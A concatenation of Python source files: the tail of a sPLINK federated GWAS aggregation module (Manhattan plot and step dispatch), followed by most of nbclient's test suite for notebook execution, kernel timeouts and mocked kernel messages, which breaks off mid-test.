for num, (name, group) in enumerate(manhattan_df_grouped):
print(name)
group.plot(kind='scatter', x='ind', y='P_LOG10', color=colors[num % len(colors)], ax=ax)
x_labels.append(name)
x_labels_pos.append((group['ind'].iloc[-1] - (group['ind'].iloc[-1] - group['ind'].iloc[0]) / 2))
print(x_labels_pos[-1])
ax.set_xticks(x_labels_pos)
ax.set_xticklabels(x_labels)
ax.set_xlim([0, len(manhattan_df)])
ax.set_xlabel('Chromosome')
ax.set_ylabel('-log10(p)')
result_dir = self.create_result_dir()
plt.savefig(f'{result_dir}/manhattan-plot.png', format='png')
logger.debug(f'Project {self.project_id}: Manhattan plot created!')
except Exception as plot_exp:
logger.error("Exception in Manhattan plot!")
logger.error(plot_exp)
# ############## sPLINK specific aggregation code
def aggregate(self):
""" OVERRIDDEN: perform sPLINK-project specific aggregations """
# The following four lines MUST always be called before the aggregation starts
super().pre_aggregate()
if self.status != ProjectStatus.AGGREGATING: # if project failed or aborted, skip aggregation
super().post_aggregate()
return
logger.info(f'Project {self.project_id}: ############## aggregate ####### ')
logger.info(f'Project {self.project_id}: #### step {self.step}')
if self.step == HyFedProjectStep.INIT: # The first step name MUST always be HyFedProjectStep.INIT
self.init_step()
elif self.step == SplinkProjectStep.SNP_ID:
self.snp_id_step()
elif self.step == SplinkProjectStep.ALLELE_NAME:
self.allele_name_step()
elif self.step == SplinkProjectStep.SAMPLE_COUNT:
self.sample_count_step()
elif self.step == SplinkProjectStep.NON_MISSING_COUNT:
self.non_missing_count()
elif self.step == SplinkProjectStep.MINOR_ALLELE:
self.minor_allele_step()
elif self.step == SplinkProjectStep.CONTINGENCY_TABLE:
self.contingency_table_step()
elif self.step == SplinkProjectStep.BETA_LINEAR:
self.beta_linear_step()
elif self.step == SplinkProjectStep.BETA_LOGISTIC:
self.beta_logistic_step()
elif self.step == SplinkProjectStep.STD_ERROR_LINEAR:
self.std_error_linear_step()
elif self.step == SplinkProjectStep.STD_ERROR_LOGISTIC:
self.std_error_logistic_step()
elif self.step == HyFedProjectStep.RESULT:
super().result_step()
# The following line MUST be the last function call in the aggregate function
super().post_aggregate()
|
test_client.py
|
import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock
import nbformat
import pytest
import xmltodict
from ipython_genutils.py3compat import string_types
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi
from nbformat import NotebookNode
from testpath import modified_env
from traitlets import TraitError
from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase
addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
ipython_input_pat = re.compile(r'<ipython-input-\d+-[0-9a-f]+>')
current_dir = os.path.dirname(__file__)
class AsyncMock(Mock):
pass
def make_async(mock_value):
async def _():
return mock_value
return _()
def normalize_base64(b64_text):
# if it's base64, pass it through b64 decode/encode to avoid
# equivalent values from being considered unequal
try:
return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii')
except (ValueError, TypeError):
return b64_text
def run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = executor.execute()
return input_nb, output_nb
def run_notebook_wrapper(args):
# since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
# we need to unpack the arguments
return run_notebook(*args)
async def async_run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = await executor.async_execute()
return input_nb, output_nb
def prepare_cell_mocks(*messages, reply_msg=None):
"""
This function prepares a executor object which has a fake kernel client
to mock the messages sent over zeromq. The mock kernel client will return
the messages passed into this wrapper back from ``preproc.kc.iopub_channel.get_msg``
callbacks. It also appends a kernel idle message to the end of messages.
"""
parent_id = 'fake_id'
messages = list(messages)
# Always terminate messages with an idle to exit the loop
messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})
def shell_channel_message_mock():
# Return the message generator for
# self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
return AsyncMock(
return_value=make_async(
NBClientTestsBase.merge_dicts(
{
'parent_header': {'msg_id': parent_id},
'content': {'status': 'ok', 'execution_count': 1},
},
reply_msg or {},
)
)
)
def iopub_messages_mock():
# Return the message generator for
# self.kc.iopub_channel.get_msg => messages[i]
return AsyncMock(
side_effect=[
# Default the parent_header so mocks don't need to include this
make_async(
NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
)
for msg in messages
]
)
def prepared_wrapper(func):
@functools.wraps(func)
def test_mock_wrapper(self):
"""
This inner function wrapper populates the executor object with
the fake kernel client. This client has its iopub and shell
channels mocked so as to fake the setup handshake and return
the messages passed into prepare_cell_mocks as the execute_cell loop
processes them.
"""
cell_mock = NotebookNode(
source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
)
executor = NotebookClient({})
executor.nb = {'cells': [cell_mock]}
# self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
message_mock = iopub_messages_mock()
executor.kc = MagicMock(
iopub_channel=MagicMock(get_msg=message_mock),
shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
execute=MagicMock(return_value=parent_id),
is_alive=MagicMock(return_value=make_async(True)),
)
executor.parent_id = parent_id
return func(self, executor, cell_mock, message_mock)
return test_mock_wrapper
return prepared_wrapper
def normalize_output(output):
"""
Normalizes outputs for comparison.
"""
output = dict(output)
if 'metadata' in output:
del output['metadata']
if 'text' in output:
output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text'])
if 'text/plain' in output.get('data', {}):
output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain'])
if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}):
output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
if 'image/svg+xml' in output.get('data', {}):
output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml'])
for key, value in output.get('data', {}).items():
if isinstance(value, string_types):
output['data'][key] = normalize_base64(value)
if 'traceback' in output:
tb = [
re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line))
for line in output['traceback']
]
output['traceback'] = tb
return output
def assert_notebooks_equal(expected, actual):
expected_cells = expected['cells']
actual_cells = actual['cells']
assert len(expected_cells) == len(actual_cells)
for expected_cell, actual_cell in zip(expected_cells, actual_cells):
# Uncomment these to help debug test failures better
# from pprint import pprint
# pprint(expected_cell)
# pprint(actual_cell)
expected_outputs = expected_cell.get('outputs', [])
actual_outputs = actual_cell.get('outputs', [])
normalized_expected_outputs = list(map(normalize_output, expected_outputs))
normalized_actual_outputs = list(map(normalize_output, actual_outputs))
assert normalized_expected_outputs == normalized_actual_outputs
expected_execution_count = expected_cell.get('execution_count', None)
actual_execution_count = actual_cell.get('execution_count', None)
assert expected_execution_count == actual_execution_count
def notebook_resources():
"""
Prepare a notebook resources dictionary for executing test
notebooks in the ``files`` folder.
"""
return {'metadata': {'path': os.path.join(current_dir, 'files')}}
def filter_messages_on_error_output(err_output):
allowed_lines = [
# ipykernel migh be installed without debugpy extension
"[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
]
filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines]
return os.linesep.join(filtered_result)
@pytest.mark.parametrize(
["input_name", "opts"],
[
("Other Comms.ipynb", dict(kernel_name="python")),
("Clear Output.ipynb", dict(kernel_name="python")),
("Empty Cell.ipynb", dict(kernel_name="python")),
("Factorials.ipynb", dict(kernel_name="python")),
("HelloWorld.ipynb", dict(kernel_name="python")),
("Inline Image.ipynb", dict(kernel_name="python")),
(
"Interrupt.ipynb",
dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
),
("JupyterWidgets.ipynb", dict(kernel_name="python")),
("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
("SVG.ipynb", dict(kernel_name="python")),
("Unicode.ipynb", dict(kernel_name="python")),
("UnicodePy3.ipynb", dict(kernel_name="python")),
("update-display-id.ipynb", dict(kernel_name="python")),
("Check History in Memory.ipynb", dict(kernel_name="python")),
],
)
def test_run_all_notebooks(input_name, opts):
"""Runs a series of test notebooks and compares them to their actual output"""
input_file = os.path.join(current_dir, 'files', input_name)
input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
assert_notebooks_equal(input_nb, output_nb)
def test_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
threads = [
threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
for label in ("A", "B")
]
[t.start() for t in threads]
[t.join(timeout=2) for t in threads]
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_async_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
tasks = [
async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B")
]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_async_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_execution_timing():
"""Compare the execution timing information stored in the cell with the
actual time it took to run the cell. Also check for the cell timing string
format."""
opts = dict(kernel_name="python")
input_name = "Sleep1s.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
input_nb, output_nb = run_notebook(input_file, opts, res)
def get_time_from_str(s):
time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
return datetime.datetime.strptime(s, time_format)
execution_timing = output_nb['cells'][1]['metadata']['execution']
status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
status_idle = get_time_from_str(execution_timing['iopub.status.idle'])
cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])
delta = datetime.timedelta(milliseconds=100)
assert status_busy - cell_start < delta
assert execute_input - cell_start < delta
assert execute_reply - cell_end < delta
assert status_idle - cell_end < delta
def test_synchronous_setup_kernel():
nb = nbformat.v4.new_notebook()
executor = NotebookClient(nb)
with executor.setup_kernel():
# Prove it initalized client
assert executor.kc is not None
# Prove it removed the client (and hopefully cleaned up)
assert executor.kc is None
def test_startnewkernel_with_kernelmanager():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
executor.start_new_kernel()
kc = executor.start_new_kernel_client()
# prove it initalized client
assert kc is not None
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
def test_start_new_kernel_history_file_setting():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
kc = km.client()
# Should start empty
assert executor.extra_arguments == []
# Should assign memory setting for ipykernel
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# Should not add a second hist_file assignment
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
class TestExecute(NBClientTestsBase):
"""Contains test functions for execute.py"""
maxDiff = None
def test_constructor(self):
NotebookClient({})
def test_populate_language_info(self):
nb = nbformat.v4.new_notebook() # Certainly has no language_info.
executor = NotebookClient(nb, kernel_name="python")
nb = executor.execute()
assert 'language_info' in nb.metadata
def test_empty_path(self):
"""Can the kernel be started when the path is empty?"""
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
res = self.build_resources()
res['metadata']['path'] = ''
input_nb, output_nb = run_notebook(filename, {}, res)
assert_notebooks_equal(input_nb, output_nb)
@pytest.mark.xfail(
"python3" not in KernelSpecManager().find_kernel_specs(),
reason="requires a python3 kernelspec",
)
def test_empty_kernel_name(self):
"""Can kernel in nb metadata be found when an empty string is passed?
Note: this pattern should be discouraged in practice.
Passing in no kernel_name to NotebookClient is recommended instead.
"""
filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
res = self.build_resources()
input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
assert_notebooks_equal(input_nb, output_nb)
with pytest.raises(TraitError):
input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)
def test_disable_stdin(self):
"""Test disabling standard input"""
filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)
# We need to special-case this particular notebook, because the
# traceback contains machine-specific stuff like where IPython
# is installed. It is sufficient here to just check that an error
# was thrown, and that it was a StdinNotImplementedError
self.assertEqual(len(output_nb['cells']), 1)
self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
output = output_nb['cells'][0]['outputs'][0]
self.assertEqual(output['output_type'], 'error')
self.assertEqual(output['ename'], 'StdinNotImplementedError')
self.assertEqual(
output['evalue'],
'raw_input was called, but this frontend does not support input requests.',
)
def test_timeout(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(TimeoutError) as err:
run_notebook(filename, dict(timeout=1), res)
self.assertEqual(
str(err.value.args[0]),
"""A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
)
def test_timeout_func(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
def timeout_func(source):
return 10
with pytest.raises(TimeoutError):
run_notebook(filename, dict(timeout_func=timeout_func), res)
def test_kernel_death_after_timeout(self):
"""Check that an error is raised when the kernel is_alive is false after a cell timed out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
executor = NotebookClient(input_nb, timeout=1)
with pytest.raises(TimeoutError):
executor.execute()
km = executor.create_kernel_manager()
async def is_alive():
return False
km.is_alive = is_alive
# Will be a RuntimeError or subclass DeadKernelError depending
# on if jupyter_client or nbconvert catches the dead client first
with pytest.raises(RuntimeError):
input_nb, output_nb = executor.execute()
def test_kernel_death_during_execution(self):
"""Check that an error is raised when the kernel is_alive is false during a cell
execution.
"""
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(input_nb)
with pytest.raises(RuntimeError):
executor.execute()
def test_allow_errors(self):
"""
Check that conversion halts if ``allow_errors`` is False.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(allow_errors=False), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_force_raise_errors(self):
"""
Check that conversion halts if the ``force_raise_errors`` traitlet on
NotebookClient is set to True.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(force_raise_errors=True), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_reset_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, a new one must have been created
kc = executor.kc
assert kc is not None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, the previously created one must have been reused
assert kc == executor.kc
executor.execute(reset_kc=True, cleanup_kc=False)
# we asked to reset the kernel client, the previous one must have been cleaned up,
# a new one must have been created
assert kc != executor.kc
def test_cleanup_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute()
# we asked to cleanup the kernel client (default is True)
assert executor.kc is None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client
# a new one must have been created and should still be available
assert executor.kc is not None
def test_custom_kernel_manager(self):
from .fake_kernelmanager import FakeCustomKernelManager
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
executor = NotebookClient(
cleaned_input_nb,
resources=self.build_resources(),
kernel_manager_class=FakeCustomKernelManager,
)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
executor.execute()
expected = FakeCustomKernelManager.expected_methods.items()
for method, call_count in expected:
self.assertNotEqual(call_count, 0, f'{method} was called')
def test_process_message_wrapper(self):
outputs = []
class WrappedPreProc(NotebookClient):
def process_message(self, msg, cell, cell_index):
result = super().process_message(msg, cell, cell_index)
if result:
outputs.append(result)
return result
current_dir = os.path.dirname(__file__)
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
wpp = WrappedPreProc(input_nb)
executed = wpp.execute()
assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
assert_notebooks_equal(original, executed)
def test_execute_function(self):
# Test the execute() convenience API
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
executed = execute(original, os.path.dirname(filename))
assert_notebooks_equal(original, executed)
def test_widgets(self):
"""Runs a test notebook with widgets and checks the widget state is saved."""
input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
opts = dict(kernel_name="python")
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(input_file)
input_nb, output_nb = run_notebook(input_file, opts, res)
output_data = [
output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
]
model_ids = [
data['application/vnd.jupyter.widget-view+json']['model_id']
for data in output_data
if 'application/vnd.jupyter.widget-view+json' in data
]
wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
for k in model_ids:
d = wdata['state'][k]
assert 'model_name' in d
assert 'model_module' in d
assert 'state' in d
assert 'version_major' in wdata
assert 'version_minor' in wdata
class TestRunCell(NBClientTestsBase):
"""Contains test functions for NotebookClient.execute_cell"""
@prepare_cell_mocks()
def test_idle_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Just the exit message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'parent_header': {'msg_id': 'wrong_parent'},
'content': {'name': 'stdout', 'text': 'foo'},
}
)
def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An ignored stream followed by an idle
assert message_mock.call_count == 2
# Ensure no output was written
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'status',
'header': {'msg_type': 'status'},
'content': {'execution_state': 'busy'},
}
)
def test_busy_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One busy message, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
# exec_reply is never received, so we expect to hit the timeout.
async def get_msg(timeout):
await asyncio.sleep(timeout)
raise Empty
executor.kc.shell_channel.get_msg = get_msg
executor.timeout = 1
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks()
def test_deadline_iopub(self, executor, cell_mock, message_mock):
# The shell_channel will complete, so we expect only to hit the iopub timeout.
message_mock.side_effect = Empty()
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
# Process a few messages before raising a timeout from iopub
def message_seq(messages):
yield from messages
while True:
yield Empty()
message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
executor.kc.shell_channel.get_msg = Mock(
return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
)
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count >= 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
)
def test_execute_input_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One ignored execute_input, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_stream_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout then stderr stream followed by an idle
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
)
def test_clear_output_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Ensure the output was cleared
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
)
def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Should be true without another message to trigger the clear
self.assertTrue(executor.clear_before_next_output)
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert not executor.clear_before_next_output
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
},
)
def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert executor.clear_before_next_output
# Ensure the output wasn't cleared yet because update_display doesn't add outputs
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0, execution_count=21)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 21
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
}
)
def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should also consume the message stream
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
